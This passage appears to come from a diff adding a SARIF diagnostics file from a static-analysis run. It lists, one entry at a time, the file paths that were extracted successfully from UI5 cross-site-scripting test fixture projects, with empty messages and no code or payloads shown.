"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/.eslintrc.json", + "uriBaseId" : "%SRCROOT%", + "index" : 238 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + 
"artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 239 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 240 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js", + "uriBaseId" : "%SRCROOT%", + "index" : 241 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controller/App.Controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 242 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/controls/Book.js", + "uriBaseId" : "%SRCROOT%", + "index" : 243 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 244 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 245 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/model/todoitems.json", + "uriBaseId" : "%SRCROOT%", + "index" : 246 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : 
"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/AllJourneys.js", + "uriBaseId" : "%SRCROOT%", + "index" : 247 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 248 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 249 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/TodoListJourney.js", + "uriBaseId" : "%SRCROOT%", + "index" : 250 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/arrangements/Startup.js", + "uriBaseId" : "%SRCROOT%", + "index" : 251 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 252 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/opaTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 253 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/pages/App.js", + "uriBaseId" : "%SRCROOT%", + "index" : 254 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + 
"text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 255 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/testsuite.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 256 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/AllTests.js", + "uriBaseId" : "%SRCROOT%", + "index" : 257 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/controller/App.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 258 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + 
"formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.html", + "uriBaseId" : "%SRCROOT%", + "index" : 259 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/unit/unitTests.qunit.js", + "uriBaseId" : "%SRCROOT%", + "index" : 260 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/util/Helper.js", + "uriBaseId" : "%SRCROOT%", + "index" : 261 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/view/App.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 262 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + 
"formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 263 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 264 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 265 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 266 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : 
"" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 267 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 268 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 269 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 270 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + 
} + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 271 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 272 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 273 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 274 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ 
{ + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 275 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 276 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 277 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 278 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 279 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 280 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 281 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 282 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 283 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 284 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 285 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 286 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + 
"physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 287 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 288 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 289 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 290 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ 
{ + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 291 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 292 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 293 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 294 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + 
"text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 295 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 296 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 297 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 298 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + 
